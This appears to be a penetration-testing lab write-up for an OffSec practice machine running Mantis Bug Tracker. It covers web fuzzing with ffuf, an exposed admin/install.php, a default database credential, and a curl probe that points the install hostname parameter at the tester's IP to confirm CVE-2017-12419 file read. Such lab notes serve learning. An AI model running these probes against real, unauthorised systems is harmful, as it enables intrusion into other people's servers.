Web
Nmap discovered a Web server on the target port 80
The running service is Apache/2.4.41 (Ubuntu)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 200 OK
Date: Thu, 10 Apr 2025 17:18:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: text/html
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ curl -I http://$IP/
HTTP/1.1 200 OK
Date: Thu, 10 Apr 2025 17:18:49 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 08 Apr 2019 14:38:27 GMT
ETag: "de09-58605ca16bec0"
Accept-Ranges: bytes
Content-Length: 56841
Vary: Accept-Encoding
Content-Type: text/html/Practice/Mantis_OffSec/2-Enumeration/attachments/{51D7A274-D19A-41D0-82F5-A60A02070312}.png)
Webroot
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php -fc 403
________________________________________________
:: Method : GET
:: URL : http://192.168.135.204/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
bugtracker [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 22ms]
css [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 25ms]
fonts [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 24ms]
img [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 28ms]
index.html [Status: 200, Size: 56841, Words: 21929, Lines: 1342, Duration: 23ms]
js [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 20ms]
license.txt [Status: 200, Size: 548, Words: 73, Lines: 13, Duration: 22ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1459 req/sec :: Duration: [0:00:57] :: Errors: 40 ::
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP/FUZZ/ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.135.204/FUZZ/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 56841, Words: 21929, Lines: 1342, Duration: 28ms]
img [Status: 200, Size: 3100, Words: 183, Lines: 28, Duration: 35ms]
icons [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 37ms]
css [Status: 200, Size: 2791, Words: 149, Lines: 26, Duration: 20ms]
js [Status: 200, Size: 2860, Words: 179, Lines: 26, Duration: 21ms]
fonts [Status: 200, Size: 1571, Words: 97, Lines: 20, Duration: 45ms]
bugtracker [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 318ms]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 18ms]
:: Progress: [207630/207630] :: Job [1/1] :: 1612 req/sec :: Duration: [0:02:06] :: Errors: 0 ::bugtracker
/bugtracker
/Practice/Mantis_OffSec/2-Enumeration/attachments/{310839DA-32F8-456B-9C66-CE21A13813A1}.png)
Redirected to a Mantis Bug Tracker login page at /bugtracker/login_page.php
There is a warning that the admin directory should be removed or restricted
/Practice/Mantis_OffSec/2-Enumeration/attachments/Pasted-image-20250410193022.png)
Mantis Bug Tracker is a free and open source, web-based bug tracking system. The most common use of MantisBT is to track software defects. However, MantisBT is often configured by users to serve as a more generic issue tracking system and project management tool.
Source code is available for review
/Practice/Mantis_OffSec/2-Enumeration/attachments/{E49E9447-8B6C-4C6F-BC98-558DD943C999}.png)
Default credentials do not work
Registration
/Practice/Mantis_OffSec/2-Enumeration/attachments/{368C53C6-3293-4B8C-98DE-FFF021C98E6F}.png)
/Practice/Mantis_OffSec/2-Enumeration/attachments/Pasted-image-20250410194144.png)
The registration requires activation
N/A
Admin Directory
There is a warning in the login page about the admin page
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/bugtracker/admin/FUZZ -ic -e .html,.txt,.php -fc 403
________________________________________________
:: Method : GET
:: URL : http://192.168.135.204/bugtracker/admin/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
check [Status: 301, Size: 335, Words: 20, Lines: 10, Duration: 18ms]
index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
install.php [Status: 200, Size: 8749, Words: 464, Lines: 186, Duration: 26ms]
schema.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 22ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1801 req/sec :: Duration: [0:00:50] :: Errors: 0 ::Fuzzing the /admin directory reveals interesting endpoints
/admin/check
/Practice/Mantis_OffSec/2-Enumeration/attachments/{F63946D2-0FCE-407D-807B-3AD047741B91}.png)
/Practice/Mantis_OffSec/2-Enumeration/attachments/{F24059A6-CBD2-4B27-9033-1B63CB235362}.png)
The /admin/check endpoint appears to check the current installation of the MantisBT by executing a series of PHP files
It leaks the web root directory; /var/www/html/bugtracker
/admin/install.php
/Practice/Mantis_OffSec/2-Enumeration/attachments/Pasted-image-20250410200623.png)
While the /admin/install.php endpoint checks for pre-installation, it also has the Upgrade Options section to install
Default Credential
/Practice/Mantis_OffSec/2-Enumeration/attachments/{B1EC7399-2C8D-44B7-A1D4-60AE1D71D93F}.png)
/Practice/Mantis_OffSec/2-Enumeration/attachments/Pasted-image-20250410200834.png)
The default credential, root:, worked.
- The installation process recommend setting up the database
- It also updated the configuration file;
config/config_inc.php - The installation appears to be completed, there is a button to log in
Failed Login
/Practice/Mantis_OffSec/2-Enumeration/attachments/Pasted-image-20250410201236.png)
/Practice/Mantis_OffSec/2-Enumeration/attachments/{286CDF4B-DBF9-4A07-AD9C-DA5F9FFDF39B}.png)
Attempting to login with as the root account with a blank password failed.
This is the DB credential after all.
Vulnerabilities
/Practice/Mantis_OffSec/2-Enumeration/attachments/{3AD55579-6804-43E7-83EB-4F4930117D5A}.png)
While the version information has not been identified, there is an unauthenticated RCE exploit for 2.3.0
/Practice/Mantis_OffSec/2-Enumeration/attachments/{0538DDE1-05CA-41F1-8D41-065A8DFB1DA6}-1.png)
Given their latest release is 2.27.1, it might just work
It did not work
Vulnerabilities in /admin/install.php
/Practice/Mantis_OffSec/2-Enumeration/attachments/{1F719016-CA97-4351-91B0-F89AA72A1FED}.png)
Given the extensive capability of the /admin/install.php file above, it’s worth looking into it for vulnerability
It reveals an article about an arbitrary file read vulnerability; CVE-2017-12419
/Practice/Mantis_OffSec/2-Enumeration/attachments/{CF0CAD54-ABE4-4C42-943F-61CC7E23D8E5}.png)
Further reading the article, it mentions that arbitrary file read is achievable through the admin/install.php file as it supports installation of the database remotely through the install=3 and hostname parameter.
Testing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ curl -s "http://$IP/bugtracker/admin/install.php?install=3&hostname=192.168.45.157"Sending the testing payload
/Practice/Mantis_OffSec/2-Enumeration/attachments/{D0864529-658C-4216-A755-95426D4AEEEC}.png)
Confirmed.
The target MatinsBT is likely vulnerable to CVE-2017-12419